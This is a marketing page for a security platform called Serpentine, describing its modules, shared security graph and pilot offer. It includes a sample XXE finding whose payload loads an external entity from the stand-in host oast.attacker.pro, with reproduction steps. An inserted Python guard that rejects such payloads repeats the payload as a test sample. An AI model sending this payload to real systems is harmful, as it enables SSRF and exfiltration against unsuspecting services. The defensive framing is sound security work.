Security Operating System
Your security stack is fragmented. Serpentine replaces it.
One platform for continuous audit and detection, offensive validation, infrastructure hardening, compliance governance, and adversarial research. Five modules. One reasoning layer. One security graph.
Sovereign EU infrastructure · No customer data used for training · SOC 2 Type II: in progress
Active finding
Exposed admin endpoint
Administrative access exposed without authentication
Napad
Automated exploit confirmed unauthenticated access. Data exfiltration possible.
Output
Proof-of-concept captured • Reproduction steps documented • Business impact assessed
Shared State
Updates exploitability status in shared graph
The Problem
Security stacks were not built to work together.
Most teams run separate systems for audit, testing, hardening, and compliance. Each system creates its own output. None of those outputs become a shared operating state.
Fragmented operating model
Result: manual correlation, delayed validation, duplicated work
The Shift
From fragmented tools to a security operating system.
Serpentine does not add another dashboard. It changes where security work lives: one shared graph across findings, validation, remediation, and evidence.
Current State: Fragmented Tools
Discovery
Vulnerability scanners
Validation
Manual pentest
Remediation
Ticketing systems
Compliance
Spreadsheets
With Serpentine: Unified System
Discovery
Odbrana
Validation
Napad
Remediation
Postava
Compliance
Regulativa
Reality Check
Security posture is often wrong.
Most systems claim controls are in place. Serpentine shows where reality breaks them.
Most security platforms tell you what you've declared. Serpentine tells you what's actually true.
Declared control state
All production access requires MFA
Policy assertion dated Jan 2024
Observed enforcement state
2 production systems have no MFA enforcement evidence
Detected by Odbrana scan + Regulativa mapping
Why this matters: Breaks SOC 2 attestation · Invalidates ISO control A.5.15
Declared control state
All critical findings are resolved
Based on ticket status in ticketing system
Observed enforcement state
Exploitability was never validated
3 findings closed without Napad validation
Why this matters: Creates unverified risk exposure · False closure masks active vulnerabilities
This is what Serpentine actually produces
XXE Injection — External Entity Processing
Content-Type: application/xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM
"http://oast.attacker.pro">
]>
...
DNS callback received from target infrastructure
CVSS 9.1 · CWE-611 · Evidence captured
Exploit Confirmed
Out-of-band DNS callback received
oast.attacker.pro → 203.0.113.42
Reproduction
Send XML payload to endpoint. Observe callback on controlled DNS server.
Proof
External entity resolution confirmed. SSRF to internal network possible.
Linked to finding ODB-2024-0847
Control Contradiction
Audit assertion invalidated. Control requires remediation evidence before re-attestation.
Adversarial Context
This XXE pattern matches campaign cluster NS-A7 TTPs (T1190 → T1059 → T1041). 12 documented exploitations in public threat research. Estimated attacker dwell time post-exploitation: 4-11 days.
Chained risk
If combined with weak egress filtering (detected on adjacent asset), enables out-of-band exfiltration of internal service map.
Recommended priority elevation: validate against authenticated paths within 72h.
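As an added, defender-side example (not Serpentine's output or code) of the remediation evidence this finding asks for: a stdlib-only Python guard that refuses the DOCTYPE and external-entity constructs in the payload above before expat resolves anything, so the out-of-band lookup never starts. The `XXE_PAYLOAD` and `BENIGN` samples are constructed here; `oast.attacker.pro` is the host named in the finding.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Input carried a DOCTYPE, entity declaration or external entity
    reference (the CWE-611 surface)."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML into nested {tag, attrs, children, text} dicts, refusing
    every construct an XXE payload needs before expat can resolve it."""
    parser = expat.ParserCreate()
    # Never expand parameter entities (e.g. %xxe; in an internal subset).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def forbid(*_args):
        raise UnsafeXML("DOCTYPE / entity constructs are not accepted")

    parser.StartDoctypeDeclHandler = forbid    # fires on '<!DOCTYPE'
    parser.EntityDeclHandler = forbid          # fires on '<!ENTITY'
    parser.ExternalEntityRefHandler = forbid   # fires before any fetch

    root = {"tag": None, "attrs": {}, "children": [], "text": ""}
    stack = [root]

    def start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "children": [], "text": ""}
        stack[-1]["children"].append(node)
        stack.append(node)

    def chars(text):
        stack[-1]["text"] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = lambda _tag: stack.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return root["children"][0]


def rejects(data: bytes) -> bool:
    """True when the guard refuses the document (the event worth logging)."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


# Constructed samples (not captured traffic): the finding's payload shape
# and a benign document the same endpoint should still accept.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://oast.attacker.pro">
]>
<root>&xxe;</root>"""
BENIGN = b'<order id="42"><item>widget</item></order>'

if __name__ == "__main__":
    print("XXE payload rejected:", rejects(XXE_PAYLOAD))        # True
    print("Benign root tag:", parse_untrusted_xml(BENIGN)["tag"])  # order
```

The rejection happens on the `<!DOCTYPE` token itself, so counting `UnsafeXML` raises at the endpoint gives a direct detection signal for the pattern in this finding.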
See what your system gets wrong
We'll show real contradictions in your environment.
Book a Demo
30-minute technical walkthrough · No slides, real system
The Architecture
Inside the shared security graph.
Serpentine does not move data between disconnected tools. It stores findings, validation, remediation, evidence, controls, assets, risks, and actions in one operating state.
This is not a dashboard aggregating external data. This is an operating system where every action updates the same state.
The Platform
Four execution modules. One reasoning layer.
Specialized interfaces for each security discipline, unified by one security graph and one research layer.
Odbrana
Security Audit
Ingests scanner output and structures it into the shared graph.
Napad
Offensive Security
Tests whether findings are actually exploitable in context.
Postava
Infrastructure Hardening
Generates or applies hardening policy and captures proof.
Regulativa
Compliance Governance
Maps outcomes to frameworks and produces audit-ready evidence.
Istraga operates across all four execution modules as the reasoning layer.
All modules read and write to the same security graph. Istraga reasons across all outputs.
The Mechanism
How Serpentine turns findings into evidence.
Normalize
Odbrana
Turns scanner output into structured findings.
Updates the same operating state
Validate
Napad
Confirms whether the risk is exploitable.
Updates the same operating state
Remediate
Postava
Creates or applies hardening policy.
Updates the same operating state
Prove
Regulativa
Maps the outcome to controls and evidence.
Updates the same operating state
Reason
Istraga
Synthesises across all steps. Validates attack paths, predicts emerging risk.
Reads from all
The value is not the steps.
The value is that every step updates one system.
Use Cases
Built for the teams responsible for proving security.
CISO
- Risk visibility across all domains
- Board-ready security posture
- Audit-ready evidence on demand
MSSP / Security Firm
- Repeatable delivery model
- Client-ready reporting
- Multi-tenant workflows
Industries
Built for environments where evidence matters.
Trust
Trust, published.
Security platforms cannot ask for trust while hiding their own controls. SPNT publishes its security posture, subprocessors, responsible disclosure policy, and data handling documentation.
What Serpentine is not
Honest boundaries
Serpentine does not try to replace everything. These are the systems it complements.
Not an EDR
Serpentine does not deploy endpoint agents. Host-level process forensics, real-time syscall monitoring, and post-compromise endpoint hunting require a dedicated endpoint platform. Serpentine handles cloud, identity, and attack-surface coverage. The two are complementary.
Not a SIEM
Serpentine does not retain raw logs. The telemetry layer normalises cloud-audit and identity events into structured graph records — useful for correlation and reasoning, not for petabyte-scale search or custom rule authoring. Organisations needing full raw-log retention should run Serpentine alongside a dedicated SIEM.
Not a CSPM
A dedicated cloud-posture platform may have broader inventory coverage across dozens of cloud accounts. Serpentine prioritises depth over breadth: every finding it surfaces is graph-grounded, exploit-validated, and tied to a compliance obligation. For "which of these actually matters today?" rather than "how many misconfigs do we have?", Serpentine's model is the right one.
The Pilot
30 / 60 / 90 day framework
A structured pilot that proves value before commitment.
Day 30 — Coverage
- Detection module connected to production assets
- First OSINT enrichment loop running
- Initial finding register delivered
Day 60 — Validation
- Offensive validation on highest-priority findings
- Hardening policy generated for two control gaps
- First control-contradiction report delivered to your CISO
Day 90 — Evidence
- Compliance mapping complete for chosen framework (SOC 2 / ISO 27001 / NIS2 / DORA)
- First Istraga consequence analysis published
- Pilot decision: continue, expand, or stop — your call
Pilot guarantee — if at day 90 the pilot has not produced audit-ready evidence on at least one framework, the pilot fee is refunded in full. Refund applies to the pilot engagement only; does not extend to subsequent commercial contracts.
This is not a demo environment. This is how your system will be evaluated.
One finding. Full lifecycle. Real validation.
See what your current stack misses.
Book a live walkthrough. We will show how one finding exposes gaps in validation, remediation, evidence, and adversarial context that most teams never see.